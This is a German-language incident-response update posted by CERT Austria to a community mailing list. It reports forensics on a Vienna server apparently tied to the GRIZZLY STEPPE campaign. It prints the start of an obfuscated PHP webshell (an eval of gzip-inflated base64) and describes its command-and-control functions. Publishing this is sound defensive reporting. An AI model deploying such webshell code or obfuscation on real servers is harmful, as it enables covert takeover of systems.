[Wien] Status update GRIZZLY STEPPE

L. Aaron Kaplan (spam-protected)
Mo Jan 2 18:33:12 CET 2017


Hi Listen,


weil wir gesagt haben, dass wir bei diesem Fall sehr transparent kommunizieren werden, ist hier mal ein update, was wir heute getan haben.

MO, 10:00 Vormittags haben sich Martin Schmiedecker (SBA Research, Funkfeuer Wien), Adrian Dabrowski (SBA Research, Funkfeuer Wien), Adi Kriegisch (Funkfeuer Wien, VRVis) und ich im CERT Büro getroffen und die Forensik begonnen.

Dabei gab es einige interessante Ergebnisse.


## Sat, 31/12/2016

  * 18:00 es werden disk und RAM images vom marvin gemacht.

## Mo, 2/1/2016

### Webshell

  Adrian findet , dass am marvin eine sogenannte PHP "webshell" installiert wurde.
So was schaut so aus:

```
 <?php eval(gzinflate(base64_decode('7Vxbc9palv4rZ6oydZI5PRMkJGEqk4c0yEhIthUjQNJLlxpJQVzEJcaAu/q/z1r7Im1dwE5y+mn6wRUH9mXttdflW5ft5JDNntJN9tv3p/3f9pun9+++/+Vd9uEf35/Cp3T227tV/PQU779//v1L+Ne/92b9SI9vk8E3Y26mw4W1tFd36/vsYeNsv+4e96Pv7tP4MHmeHr2Tfw5eWpLcVlStc9P9+Pn3T2wtO84+7zeHLHoPW67i7D3f48NH+cOnd9nn92n29OFd9p/viwkfPqXJ+/9Auvbx02Gf/fbu+6d/wkfvsv9tffjHu+yPz6XB/3y3j7efvx/+Djvky8Ox/kv+8D/VT1v0809sYfgOv4XR+TRYC5aMn8PV+7+H32NN+VsUzzZR/J6z7HdL769lX95Hm+nOVtT+eNqdu4NsbEvn1JZuTi0tPMqb7CiPw9tI6x5l31FmgbxPhuuTa3pqMnRWM/NlEW1GJ1taf7ZMN6Pj0603MCZj1fnp9cZ+9ySb09q67jp7cL2fX3ey8dpxx2vfS/H+qyScX+33p+rD9l7vbb+aliav1p3WZtRuaaNuq71YObf25sH3MmeSSk57sfx6O5LkzXR7NzmksultZn43u9MTZzTNvgaKbE8G3nyyNh
....
```

  Nach doppelter decryption ist es lesbarer PHP code. Dieser kann sowohl Dateien hin und her kopieren als auch "tasks" kontrollieren. Wir vermuten, dass dies der Code fuer den C&C Server ("Command & Control") ist. "clients" koennen tasks zugeordnet werden, die "clients" koennen gelingt werden, sie koennen "results" zurückschicken. Und es gibt fuer jeden client einen key. Der PHP code hat einen admin mode, mit dem er "tasks" an clients verteilen kann. Der PHP code hat eine Funktion, um die public IP der clients raus zu finden und ihnen es zu sagen.

  Es wirkt nach einfacher aber effektiver PHP code , der durchaus ausreichen wuerde, um mehrere infiziert Rechner zu kontrollieren.

  Es *kann* somit der C&C server code sein. Bestimmt wissen wir das aber noch nicht. Und wir koennen derzeit auch nicht sagen, ob dieser Code auch in der GRIZZLY STEPPE Kampagne teilgenommen hat.


### Log files

Leider finden wir kaum noch verwendbare log files.
Wir finden relativ wenige und nicht sehr aussagekräftige Zugriffe auf die URL des PHP codes.



### Presse

Markus Sulzbacher vom Standard hat uns bei der Arbeit besucht.
Ein Artikel ist soeben erschienen: http://derstandard.at/2000050143907/Russische-Hacker-nutzten-laut-FBI-auch-Rechner-in-Wien


### Forensik

RAM images und disk images waren nicht lesbar, es wird remote RAM forensik probiert.


## Zusammenfassung

Die einfachste Erklärung ist, dass der marvin (193.238.157.16) unsicher war, gehackt wurde und im Zeitraum Juni 2016 (von wem auch immer) missbraucht wurde. Ob das wirklich der Hack gegen den DNC (Democratic National Congress) war oder nicht, koennen wir von hier aus nicht feststellen.
Die PHP shell ist definitiv verdächtig.

More work needed. Forensik kann lange dauern.



(Text Aaron, Queck-check Adrian und Martin)


--
//  CERT Austria
//  L. Aaron Kaplan <(spam-protected)>
//  T: +43 1 505 64 16 78
//  http://www.cert.at
//  Eine Initiative der nic.at GmbH
//  http://www.nic.at/ - Firmenbuchnummer 172568b, LG Salzburg

-------------- nächster Teil --------------
Ein Dateianhang mit Binärdaten wurde abgetrennt...
Dateiname   : signature.asc
Dateityp    : application/pgp-signature
Dateigröße  : 801 bytes
Beschreibung: Message signed with OpenPGP using GPGMail
URL         : <http://lists.funkfeuer.at/pipermail/wien/attachments/20170102/0d473a93/attachment.sig>


Mehr Informationen über die Mailingliste Wien